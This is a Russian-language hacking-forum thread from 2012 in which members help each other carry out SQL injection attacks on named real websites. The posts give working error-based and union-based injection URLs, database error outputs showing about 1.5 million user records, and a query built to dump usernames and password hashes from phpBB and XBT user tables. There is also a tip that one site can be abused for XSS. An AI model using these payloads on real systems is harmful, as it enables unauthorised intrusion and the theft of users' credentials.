HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #20191  
Старый 25.03.2012, 17:03
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию

такс, тут ещо проблема

http://torrnado.ru/peerlist.php?id=982+and%28select+1+from%28select+c ount%28*%29,concat%28%28select+column_name+from+in formation_schema.columns+where+table_name=0x706870 62625f7573657273+limit+19000,1%29,0x00,floor%28ran d%280%29*2%29%29x+from+information_schema.tables+g roup+by+x%29a%29--+

таблици вывело нормально

отсюда torrent:xbt_users:1567810 нехочет выводить кольнку pass(не могу поверить что она пустая)

и

нхочет вобще выводить колонки и инфу из torrenthpbb_users:1551912

ну пустой она быть нможет так как там всётак есть форум с юзерами)) как мн ето всё вывести?
 
Ответить с цитированием

  #20192  
Старый 25.03.2012, 17:16
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию

Цитата:
Сообщение от qaz  
qaz said:
ну пустой она быть нможет так как там всётак есть форум с юзерами))
Так не убеждаются, убеждаются так:

Код:
Code:
http://torrnado.ru/peerlist.php?id=982+and(select+1+from(select+count(*),concat((select+concat(count(*),0x00)+from+phpbb_users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+f
Код:
Code:
Duplicate entry '1566699' for key 'group_key' [1062]
1566699 пользователей.

Код:
Code:
http://torrnado.ru/peerlist.php?id=982+and(select+1+from(select+count(*),concat((select+concat(count(*),0x00)+from+xbt_users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+f
Код:
Code:
Duplicate entry '1567844' for key 'group_key' [1062]
1567844 пользователей.

А вот и вывод:

Код:
Code:
http://torrnado.ru/peerlist.php?id=982+or+(@:=1)||@+group+by+concat((select+substr(concat_ws(0x3a,username,user_password),1,100)+from+phpbb_users+limit+1,1),@:=@-1)having+@||min(@:=0)--+f
...
 
Ответить с цитированием

  #20193  
Старый 25.03.2012, 17:22
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию

Цитата:
Сообщение от Ereee  
Ereee said:
Так не убеждаются, убеждаются так:
Код:
Code:
http://torrnado.ru/peerlist.php?id=982+and(select+1+from(select+count(*),concat((select+concat(count(*),0x00)+from+phpbb_users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+f
Код:
Code:
Duplicate entry '1566699' for key 'group_key' [1062]
1566699 пользователей.
Код:
Code:
http://torrnado.ru/peerlist.php?id=982+and(select+1+from(select+count(*),concat((select+concat(count(*),0x00)+from+xbt_users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+f
Код:
Code:
Duplicate entry '1567844' for key 'group_key' [1062]
1567844 пользователей.
ну так я же и написал

отсюда torrent:xbt_users:1567810

torrenthpbb_users:1551912

чё ето за чудо конструкция такая?

(@:=1)||@

где в муналах по sql я про неё могу почитать
 
Ответить с цитированием

  #20194  
Старый 25.03.2012, 17:27
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию

Цитата:
Сообщение от qaz  
qaz said:
чё ето за чудо конструкция такая?
(@:=1)||@
где в муналах по sql я про неё могу почитать
Переменные, как не сложно догадатся.
 
Ответить с цитированием

  #20195  
Старый 25.03.2012, 17:38
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию

http://www.scientific-work.ru/index.php?id=303+union+select+1,2,3,4,5,6,7,8,9,10--+

тут не пойму как данные вывести

что не подставлю лимит или - пишет что не такой страници

и тут тоже

http://www.ivrus.biz/showcat.php?id=7+union+select+version%28%29,versio n%28%29,version%28%29--+
 
Ответить с цитированием

  #20196  
Старый 25.03.2012, 17:54
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
Отправить сообщение для Cennarios с помощью ICQ
По умолчанию

http://www.scientific-work.ru/index.php?id=-303+union+select+1,2,3,4,5,6,7,version(),0x1,10--+ Вот так. Данные при редиректе в строке URL.
 
Ответить с цитированием

  #20197  
Старый 25.03.2012, 18:00
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию

Цитата:
Сообщение от qaz  
qaz said:
и тут тоже
http://www.ivrus.biz/showcat.php?id=7+union+select+version%28%29,versio n%28%29,version%28%29--+
Вывода нет походу:

http://www.ivrus.biz/showcat.php?id=7-9999999.9+union+select+user(),user(),user()--+f

Но за то, можно заюзать как XSS.
 
Ответить с цитированием

  #20198  
Старый 25.03.2012, 18:06
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию

http://board.ugmk.info/?rub=topic&page=3144&from=943260

а тут как? что не подставлю постоянно ошибка
 
Ответить с цитированием

  #20199  
Старый 25.03.2012, 18:09
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию

Цитата:
Сообщение от qaz  
qaz said:
http://board.ugmk.info/?rub=topic&page=3144&from=943260
а тут как? что не подставлю постоянно ошибка
В LIMITе там, не раскрутишь.

Крути эту:

http://board.ugmk.info/?b=1332679205
 
Ответить с цитированием

  #20200  
Старый 25.03.2012, 18:16
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию

Цитата:
Сообщение от Ereee  
Ereee said:
В LIMITе там, не раскрутишь.
Крути эту:
http://board.ugmk.info/?b=1332679205
ок, а тут как?

http://baratro.ru/subcat.php?id=22'

таже самая проблема
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ